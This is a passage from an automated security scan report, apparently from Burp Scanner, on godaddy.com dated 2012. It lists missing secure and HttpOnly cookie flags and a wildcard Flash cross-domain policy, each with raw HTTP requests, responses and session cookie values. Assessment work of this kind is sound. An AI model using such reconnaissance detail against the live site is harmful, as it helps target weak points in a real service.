Set-Cookie: traffic=cookies=1&referrer=http://www.godaddy.com/domains/searchresults.aspx?ci=44919&sitename=www.godaddy.com&page=/domains/customize.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=ci=14641%26hpGoogleStatic%3d1&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=221039fb-1ef3-4a9c-9888-ebefb84fcda3&referringdomain=&split=75; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:32:35 GMT
Content-Length: 165054


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1">
<
...[SNIP]...

2.21. https://www.godaddy.com/gdshop/browser_update.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /gdshop/browser_update.asp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gdshop/browser_update.asp?msvar=true HTTP/1.1
Host: www.godaddy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://burp/show/23
Cookie: visitor=vid=f2b54a8e-6e54-487a-ba8b-057ce9ed41db; test=ok; serverVersion=A; domainYardVal=%2D1; ASPSESSIONIDQUBACAQD=LJHOPMDCEKEPLKEAGHMHKDIL

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html
Expires: Wed, 01 Jan 1997 12:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: traffic=referringdomain=&referringpath=&shopper=&querystring=msvar%3Dtrue&server=M1PWCORPWEB152&ci=&isc=&privatelabelid=1&page=%2Fgdshop%2Fbrowser%5Fupdate%2Easp&sitename=www%2Egodaddy%2Ecom&clientip=174%2E36%2E218%2E2&status=200+OK&referrer=http%3A%2F%2Fburp%2Fshow%2F23&cookies=1; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; expires=Fri, 08-Mar-2013 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Thu, 15-Mar-2012 07:00:00 GMT; domain=.godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 08 Mar 2012 20:56:39 GMT
Content-Length: 16684

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title>Browser Update Page</title>
<meta http-equiv="Content-T
...[SNIP]...

2.22. https://www.godaddy.com/gdshop/change/ChangeRequest.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /gdshop/change/ChangeRequest.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gdshop/change/ChangeRequest.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Mon, 27 Feb 2012 03:02:56 GMT
Location: https://supportcenter.godaddy.com/DomainServices/ChangeRequestPage.aspx
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Mon, 04-Mar-2013 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Sun, 11-Mar-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQGQBBDAA=GCKAMEKBKEFPEHJMMNDDOGNK; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Mon, 05 Mar 2012 01:42:56 GMT
Connection: close


2.23. https://www.godaddy.com/gdshop/myportal/consolidate.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /gdshop/myportal/consolidate.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gdshop/myportal/consolidate.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache
Content-Length: 248
Content-Type: text/html
Expires: Mon, 27 Feb 2012 03:02:56 GMT
Location: https://www.godaddy.com/gdshop/shopper_lookup.asp?check%5Fsession=&myid=&se=%2B&target=myportal%2Fconsolidate%2Easp
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Mon, 04-Mar-2013 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Sun, 11-Mar-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQGQBBDAA=DCKAMEKBMDJNHMOBJJGMMGNM; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Mon, 05 Mar 2012 01:42:55 GMT
Connection: close

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="https://www.godaddy.com/gdshop/shopper_lookup.asp?check%5Fsession=&amp;myid=&amp;se=%2B&amp;target
...[SNIP]...

2.24. https://www.godaddy.com/gdshop/registrar/search.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /gdshop/registrar/search.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gdshop/registrar/search.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Content-Length: 0
Content-Type: text/html; Charset=utf-8
Expires: Mon, 27 Feb 2012 03:02:53 GMT
Location: https://www.godaddy.com/domains/search.aspx
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Mon, 04-Mar-2013 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Sun, 11-Mar-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQGQBBDAA=KBKAMEKBDHNGEPHKMPDBKEMD; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Mon, 05 Mar 2012 01:42:53 GMT
Connection: close


2.25. https://www.godaddy.com/gdshop/shopper_lookup.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /gdshop/shopper_lookup.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gdshop/shopper_lookup.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache
Content-Length: 193
Content-Type: text/html
Expires: Sun, 04 Mar 2012 01:42:58 GMT
Location: https://idp.godaddy.com/login.aspx?login=&spkey=GDSWB137&target=
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Mon, 04-Mar-2013 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Sun, 11-Mar-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQGQBBDAA=PDKAMEKBEOANBBADAFCIDEEG; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Mon, 05 Mar 2012 01:42:58 GMT
Connection: close

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="https://idp.godaddy.com/login.aspx?login=&amp;spkey=GDSWB137&amp;target=">here</a>.</body>

2.26. https://www.godaddy.com/offers/hot-deals.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /offers/hot-deals.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /offers/hot-deals.aspx HTTP/1.1
Host: www.godaddy.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://idp.godaddy.com/retrieveaccount.aspx?ci=9107&spkey=GDSWNET-M1PWCORPWEB137
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ws5jw4vh5tuzq2dphfi4us5a; preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; SplitValue1=75; flag1=cflag=us; currencypopin1=cdisplaypopin=false; GoogleADServicesgoogleadwordshome=zbnczeofsfcgdhzeqcxgcadeafyilatc; pathway=221039fb-1ef3-4a9c-9888-ebefb84fcda3; HPBackground=Danica2; pagecount=4; actioncount=; app_pathway=; visitor=vid=221039fb-1ef3-4a9c-9888-ebefb84fcda3; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMinorVer=1&fMajorVer=11&slMajorVer=-1&slMinorVer=-1; MemPDC1=ljrecdtffbugaahgraqdyjybtizayfne; MemPDCLoc1=net; PCSplitValue1=1; adc1=US; traffic=cookies=1&referrer=&sitename=videos.godaddy.com&page=/godaddy_media.aspx&server=M1PWCORPWEB125&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=221039fb-1ef3-4a9c-9888-ebefb84fcda3&referringdomain=&split=75; currency1=potableSourceStr=USD

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: https://www.godaddy.com/offers/hot-deals2.aspx?ci=51455
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:45:37 GMT; path=/
Date: Mon, 05 Mar 2012 01:45:37 GMT
Content-Length: 172

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://www.godaddy.com/offers/hot-deals2.aspx?ci=51455">here</a>.</h2>
</body></html>

3. Flash cross-domain policy  previous  next
There are 2 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


3.1. http://www.godaddy.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.godaddy.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Date: Mon, 05 Mar 2012 01:33:18 GMT
Connection: close
Content-Length: 150

<?xml version="1.0"?><cross-domain-policy><allow-access-from domain="*.wsimg.com" /><allow-access-from domain="*.godaddy.com" /></cross-domain-policy>

3.2. https://www.godaddy.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.godaddy.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Date: Mon, 05 Mar 2012 01:32:38 GMT
Connection: close
Content-Length: 150

<?xml version="1.0"?><cross-domain-policy><allow-access-from domain="*.wsimg.com" /><allow-access-from domain="*.godaddy.com" /></cross-domain-policy>

4. Cookie without HttpOnly flag set  previous  next
There are 131 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



4.1. http://www.godaddy.com/gdshop/catalog.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.godaddy.com
Path:   /gdshop/catalog.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gdshop/catalog.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Expires: Mon, 27 Feb 2012 03:01:05 GMT
Location: /catalog.aspx
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQCQBBDAA=MLIAMEKBNBLNDLCHLNKABKDO; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Mon, 05 Mar 2012 01:41:05 GMT
Connection: close


4.2. http://www.godaddy.com/gdshop/ecommerce/shopping-cart.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.godaddy.com
Path:   /gdshop/ecommerce/shopping-cart.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gdshop/ecommerce/shopping-cart.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Expires: Mon, 27 Feb 2012 03:01:03 GMT
Location: /ecommerce/shopping-cart.aspx
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQCQBBDAA=CLIAMEKBDCILMDEGBKAHFANG; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Mon, 05 Mar 2012 01:41:02 GMT
Connection: close


4.3. http://www.godaddy.com/gdshop/hosting/dream_website.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.godaddy.com
Path:   /gdshop/hosting/dream_website.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gdshop/hosting/dream_website.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Expires: Mon, 27 Feb 2012 03:01:01 GMT
Location: /design/web-design.aspx
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQCQBBDAA=OKIAMEKBODAEOINPDMCBKEMF; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Mon, 05 Mar 2012 01:41:00 GMT
Connection: close


4.4. http://www.godaddy.com/gdshop/prepayment/Landing.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.godaddy.com
Path:   /gdshop/prepayment/Landing.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gdshop/prepayment/Landing.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Expires: Mon, 27 Feb 2012 03:01:07 GMT
Location: /Payment/payment-options.aspx?
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQCQBBDAA=FMIAMEKBDPKCLCLHKMPECAFN; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Mon, 05 Mar 2012 01:41:07 GMT
Connection: close


4.5. http://www.godaddy.com/gdshop/sh_nonwst_websites.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.godaddy.com
Path:   /gdshop/sh_nonwst_websites.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gdshop/sh_nonwst_websites.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache
Content-Length: 227
Content-Type: text/html
Expires: Mon, 04 Mar 2002 07:00:00 GMT
Location: https://www.godaddy.com/gdshop/shopper_lookup.asp?check%5Fsession=&target=sh%5Fnonwst%5Fwebsites%2Easp
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Mon, 04-Mar-2013 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Sun, 11-Mar-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQCQBBDAA=LNIAMEKBIPLNJMPINAPIDGBK; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Mon, 05 Mar 2012 01:41:09 GMT
Connection: close

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="https://www.godaddy.com/gdshop/shopper_lookup.asp?check%5Fsession=&amp;target=sh%5Fnonwst%5Fwebsit
...[SNIP]...

4.6. https://www.godaddy.com/gdshop/broker/landing.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.godaddy.com
Path:   /gdshop/broker/landing.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gdshop/broker/landing.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Expires: Mon, 27 Feb 2012 03:02:53 GMT
Location: /domains/domain-broker.aspx
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQGQBBDAA=JBKAMEKBIDMJNPEPKIEPLEDH; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Mon, 05 Mar 2012 01:42:53 GMT
Connection: close


4.7. https://www.godaddy.com/gdshop/browser_update.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.godaddy.com
Path:   /gdshop/browser_update.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /gdshop/browser_update.asp?msvar=true HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cookie: adc1=US; currency1=potableSourceStr=USD; serverVersion=A; domainYardVal=%2D1; traffic=referringdomain=&referringpath=&shopper=&querystring=msvar%3Dtrue&server=M1PWCORPWEB137&ci=&isc=&privatelabelid=1&page=%2Fgdshop%2Fbrowser%5Fupdate%2Easp&sitename=www%2Egodaddy%2Ecom&clientip=174%2E36%2E218%2E2&status=200+OK&referrer=&cookies=1; preferences1=_sid=&gdshop_currencyType=USD&dataCenterCode=US; ASPSESSIONIDQGQBBDAA=LIKAMEKBEMKIHPKFPEGDMAGF; ASP.NET_SessionId=3ecy12tsjjozpeslsfeq1ee5
Host: www.godaddy.com
Content-Length: 27
Connection: Keep-Alive
Cache-Control: no-cache
Accept-Language: en-US

renderableItem=%2Fshow%2F27

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html
Expires: Wed, 01 Jan 1997 12:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: traffic=server=M1PWCORPWEB152&sitename=www%2Egodaddy%2Ecom&cookies=1&clientip=174%2E36%2E218%2E2&status=200+OK&referrer=&ci=&isc=&privatelabelid=1&page=%2Fgdshop%2Fbrowser%5Fupdate%2Easp&referringdomain=&referringpath=&shopper=&querystring=msvar%3Dtrue; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQUBACAQD=GMHOPMDCHEAEOLINICGCCDFA; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 08 Mar 2012 20:59:16 GMT
Content-Length: 16663

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title>Browser Update Page</title>
<meta http-equiv="Content-T
...[SNIP]...

4.8. https://www.godaddy.com/gdshop/change/ChangeRequest.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.godaddy.com
Path:   /gdshop/change/ChangeRequest.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gdshop/change/ChangeRequest.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Mon, 27 Feb 2012 03:02:56 GMT
Location: https://supportcenter.godaddy.com/DomainServices/ChangeRequestPage.aspx
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Mon, 04-Mar-2013 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Sun, 11-Mar-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQGQBBDAA=GCKAMEKBKEFPEHJMMNDDOGNK; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Mon, 05 Mar 2012 01:42:56 GMT
Connection: close


4.9. https://www.godaddy.com/gdshop/legal_agreements/show_doc.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.godaddy.com
Path:   /gdshop/legal_agreements/show_doc.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gdshop/legal_agreements/show_doc.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Expires: Mon, 27 Feb 2012 03:02:57 GMT
Location: /Agreements/ShowDoc.aspx
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQGQBBDAA=KCKAMEKBABEICJODAGCMNMLP; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Mon, 05 Mar 2012 01:42:56 GMT
Connection: close


4.10. https://www.godaddy.com/gdshop/myportal/consolidate.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.godaddy.com
Path:   /gdshop/myportal/consolidate.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gdshop/myportal/consolidate.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache
Content-Length: 248
Content-Type: text/html
Expires: Mon, 27 Feb 2012 03:02:56 GMT
Location: https://www.godaddy.com/gdshop/shopper_lookup.asp?check%5Fsession=&myid=&se=%2B&target=myportal%2Fconsolidate%2Easp
Server: Microsoft-IIS/7.5
